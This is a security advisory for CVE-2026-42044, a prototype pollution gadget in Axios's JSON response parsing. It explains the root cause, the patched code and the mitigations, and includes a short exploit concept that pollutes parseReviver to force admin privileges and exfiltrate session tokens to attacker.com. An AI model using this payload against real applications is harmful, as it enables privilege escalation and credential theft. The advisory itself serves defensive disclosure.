CVE-2026-42044: Invisible JSON Response Tampering via Prototype Pollution Gadget in Axios

Axios operates as a primary promise-based HTTP client for both browser and Node.js environments. The software implements automatic transformation of response data, specifically parsing incoming JSON payloads via the transformResponse array located in lib/defaults/index.js.

A prototype pollution gadget exists within this JSON parsing mechanism. While Axios itself does not inherently contain a prototype pollution flaw, it acts as an execution sink. If an attacker successfully pollutes the JavaScript prototype chain elsewhere in the application, Axios will execute the polluted properties during its internal configuration merging and parsing phases.

The specific attack vector targets the parseReviver attribute, which Axios passes as the second argument to the native JSON.parse() function. An attacker can hijack this process to execute arbitrary JavaScript logic against every key-value pair processed during the deserialization of HTTP responses.

This behavior maps to CWE-1321 (Improperly Controlled Modification of Object Prototype Attributes) and CWE-915 (Improperly Controlled Modification of Dynamically-Determined Object Attributes). The vulnerability affects all Axios 1.x versions prior to 1.15.2.

The root cause stems from the mechanism Axios uses to construct and evaluate its configuration objects. Prior to version 1.15.2, configuration objects were instantiated as standard JavaScript objects, meaning they inherited properties from Object.prototype.

During the response handling lifecycle, Axios invokes functions within the transformResponse array. The default JSON transformer executes JSON.parse(data, this.parseReviver), where this references the merged Axios configuration object context.

Because Axios does not define parseReviver by default, the JavaScript engine attempts to resolve the property by traversing up the prototype chain. If Object.prototype.parseReviver has been maliciously populated by an attacker, the engine retrieves and utilizes the injected function.

The native JSON.parse() specification dictates that the reviver function is called for every parsed property. Consequently, the attacker's function executes with full access to the incoming data stream, establishing a reliable execution sink for the prototype pollution primitive.

The vulnerable code path resides in lib/defaults/index.js. The default transformResponse function attempts to parse response data directly using the context's parseReviver without validating if the property is explicitly owned by the configuration object.

// lib/defaults/index.js (Vulnerable Pattern)
const defaults = {
  transformResponse: [function transformResponse(data) {
    if (typeof data === 'string') {
      try {
        return JSON.parse(data, this.parseReviver);
      } catch (e) {
        // ...
      }
    }
    return data;
  }]
};

The remediation strategy implemented in Axios 1.15.2 utilizes two distinct hardening techniques. First, commit be3336014e01f9a4fc1f8aef15303cf7daaf58db introduced strict hasOwnProperty checks to ensure configuration properties are not inherited from the prototype chain.

// lib/defaults/index.js (Patched Version via hasOwnProperty)
const defaults = {
  transformResponse: [function transformResponse(data) {
    if (typeof data === 'string') {
      try {
        const reviver = Object.prototype.hasOwnProperty.call(this, 'parseReviver') ? this.parseReviver : undefined;
        return JSON.parse(data, reviver);
      } catch (e) {
        // ...
      }
    }
    return data;
  }]
};

Second, commit 47915144662f2733e6c051bdcb895a8c8f0586aa restructured the core configuration merging utility (mergeConfig.js) to instantiate objects using Object.create(null). This creates objects completely devoid of a prototype chain, preventing any upward traversal and comprehensively eliminating this class of gadget from the configuration layer.

Exploitation requires the attacker to possess an independent prototype pollution vulnerability within the target environment. This prerequisite typically takes the form of an insecure recursive merge function, a vulnerable query string parser, or a flawed deep-copy utility.

The attacker begins by injecting a malicious payload into Object.prototype.parseReviver. The payload consists of a JavaScript function designed to intercept and manipulate the key-value pairs processed during JSON deserialization.

// Exploitation Concept
// 1. Attacker leverages external vulnerability to pollute prototype
Object.prototype.parseReviver = function(key, value) {
    if (key === 'isAdmin') return true; // Privilege Escalation
    if (key === 'sessionToken') fetch('https://attacker.com/?token=' + value); // Exfiltration
    return value;
};

Once the prototype is polluted, the attack executes passively. Any subsequent HTTP request initiated by Axios that returns an application/json payload will trigger the injected reviver function automatically. The targeted application will receive the altered data structure, processing the malicious modifications as legitimate server responses.

The primary impact of CVE-2026-42044 is the loss of data integrity. Attackers can arbitrarily modify inbound server responses before they reach application logic. This capability facilitates secondary attacks, such as client-side privilege escalation, authentication bypass, or logic manipulation depending on how the application consumes the data.

The vulnerability also presents a confidentiality risk. The reviver function executes within the context of the deserialization process, granting it read access to all sensitive keys and values returned by the remote server. An attacker can instrument the reviver to silently transmit this data to an external command and control server.

The stealth characteristics of this attack are significant. Because the tampering occurs during the native JSON.parse execution, standard application-level schema validators evaluating the final JavaScript object will process the tampered data as legitimate. The mutation operates entirely beneath the validation layer.

The CVSS v3.1 base score of 6.5 (Medium) reflects the High integrity impact and Low confidentiality impact, offset by the High attack complexity. The high complexity designation accounts for the strict prerequisite of an existing prototype pollution vector within the runtime environment. The low EPSS score (0.00098) aligns with this complexity constraint.

The definitive remediation is upgrading to Axios version 1.15.2. This release contains both the hasOwnProperty access restrictions and the architectural shift to null-prototype configuration objects, neutralizing the gadget completely.

In scenarios where immediate patching is unfeasible, developers can mitigate the gadget by explicitly shadowing the prototype property. Defining parseReviver: undefined directly within the Axios instance configuration ensures the execution context finds an own-property and halts prototype traversal.

// Temporary Mitigation
const axiosInstance = axios.create({
  parseReviver: undefined
});

Additionally, implementing environment-level hardening provides defense-in-depth against all prototype pollution vectors. Utilizing Object.freeze(Object.prototype) at application initialization prevents the modification of global prototypes, though this approach requires thorough regression testing as it may disrupt legitimate behavior in legacy libraries.